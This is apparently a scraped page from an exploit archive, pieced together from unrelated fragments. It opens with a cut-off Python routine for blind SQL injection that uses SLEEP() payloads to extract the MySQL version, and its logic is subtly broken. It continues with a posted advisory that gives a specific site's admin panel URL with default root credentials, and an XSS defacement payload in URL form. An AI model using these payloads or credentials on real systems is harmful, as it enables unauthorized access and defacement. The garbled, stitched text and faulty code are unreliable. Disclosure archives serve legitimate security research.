20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS NaiveScripters version 3.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS NaiveScripters v3.0.1 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /events.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/oceannstuedubd/events.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows